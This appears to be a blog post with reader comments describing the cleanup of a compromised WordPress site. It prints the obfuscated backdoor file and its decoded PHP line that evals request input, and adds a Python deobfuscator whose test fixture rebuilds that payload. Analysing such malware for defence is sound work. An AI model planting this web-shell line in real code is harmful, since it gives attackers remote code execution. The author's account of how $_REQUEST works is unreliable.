Just a brief update on the security issues at my website mentioned in the last post. As those of you smarter than I am on the mechanisms of these php-injection attacks probably recognized, the measures I took in the last post were not the end of the story. Sure enough, despite thinking that I had ripped enough of the attack code out to end the matter, I found that the next day my site was down again, with the same foreign code reinjected into the WordPress php files. At the risk of boring my readers, but in the hopes of helping anyone in a similar situation, I’ll relate how I solved the problem.
This article was very helpful in exposing the backdoor that the attackers left that allowed them to reintroduce the attack (I don’t think they personally did this. I believe the whole process is just automated). I scanned my server for rootkits and there were none found. All the modified files had an owner of www-data which is the unprivileged user that owns all the WordPress files. So I didn’t think someone had broken into the server through my username and password, or had any root access. Most likely they got in through an older version of WordPress that had some vulnerability. When I reinstalled WordPress after the attack, I was copying over old files with new files. If there was a file that didn’t belong, it would persist with each WordPress update. I had to find that file. I did a file diff between a clean WordPress installation and my WordPress. And there it was. A file named fetpd.php that was not supposed to be there. I looked at the file contents. Definitely a bad guy:
<?php /*4ut|*/eval/*ym' s3i*/(/*?{G5zM*/base64_decode/*T:%Zb[*/(/*l8d@*/'LyosXFgqL2V2YWwvKl9fPyovKC8qQjFBTyc … [several lines of the same] … qeX5sICov'/*0[N1puZ8*/)/*U2xKUo.*//*z'pQ^AJ*/)/*OR= Vv*//*E(og*/;/*No,S|*/ ?>
Sneaky programmer put in lots of /*comments*/ to make it look even more confusing. Using my base64 decoder after removing the comments, I got a similar string! The attacker had encoded it twice! Repeating the process I got the following, after removing more comments:
if(isset($_REQUEST['bfbltl']))eval(stripslashes($_REQUEST['bfbltl']));
I’m not an expert, and after looking up the $_REQUEST function on the PHP online help, I am still not completely certain, but I believe this function can grab code from another site, or a cookie at another site, and basically execute it as php code. So I think this was the cause of the reinfection. I am still a little disturbed because I don’t know what triggers the running of this code (is there another file somewhere calling fetpd.php?), but at least after I ripped out this little piece of nastiness the site has stayed up. Take that Russkies!
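As an added example (my own script, not code from the post or from WordPress), here is a small Python deobfuscator that automates the two steps described above: strip the /* */ noise, peel the eval(base64_decode('...')) layers, and then flag the telltale pattern of eval() over request input. The fixture is constructed to mirror the decoded one-liner wrapped twice, not the real fetpd.php, and the regexes are my own assumptions about this obfuscation style.

```python
import base64
import re

# Obfuscation seen in the injected file: /* ... */ comments between tokens
# and eval(base64_decode('...')) nested inside itself.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Signature for the final payload: eval() fed from a request superglobal.
BACKDOOR_RE = re.compile(r"eval\s*\(.*\$_(REQUEST|GET|POST|COOKIE)\b", re.S)


def strip_comments(php: str) -> str:
    """Remove the /* ... */ filler interleaved between PHP tokens."""
    return COMMENT_RE.sub("", php)


def unwrap(php: str, max_layers: int = 10):
    """Peel eval(base64_decode(...)) layers; return (final_code, layers_peeled)."""
    code = strip_comments(php)
    layers = 0
    while layers < max_layers:
        m = EVAL_B64_RE.search(code)
        if not m:
            break
        decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        code = strip_comments(decoded)   # each layer carries its own comments
        layers += 1
    return code, layers


def scan(php: str) -> dict:
    """Report how many layers were peeled and whether a request-eval backdoor remains."""
    code, layers = unwrap(php)
    return {"layers": layers, "backdoor": bool(BACKDOOR_RE.search(code)), "decoded": code}


# Constructed fixture (not the real fetpd.php): the one-liner from the post,
# base64-encoded twice with comment filler, the way the injected file was built.
def _wrap(inner: str) -> str:
    b64 = base64.b64encode(inner.encode()).decode()
    return f"eval/*x1*/(/*y2*/base64_decode/*z3*/('{b64}'/*q4*/)/*w5*/);"


PAYLOAD = "if(isset($_REQUEST['bfbltl']))eval(stripslashes($_REQUEST['bfbltl']));"
SAMPLE = "<?php /*4ut|*/" + _wrap(_wrap(PAYLOAD)) + " ?>"

if __name__ == "__main__":
    r = scan(SAMPLE)
    print(f"layers={r['layers']} backdoor={r['backdoor']}")
    print(r["decoded"])
```

Run it against any .php file that the clean-install diff flags as unexpected; two peeled layers ending in a request-eval is exactly the shape found in wp-admin.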
This post has helped me a lot, I’m having the problem. Where did you find the fetpd.php file?
It was in wp-admin/user/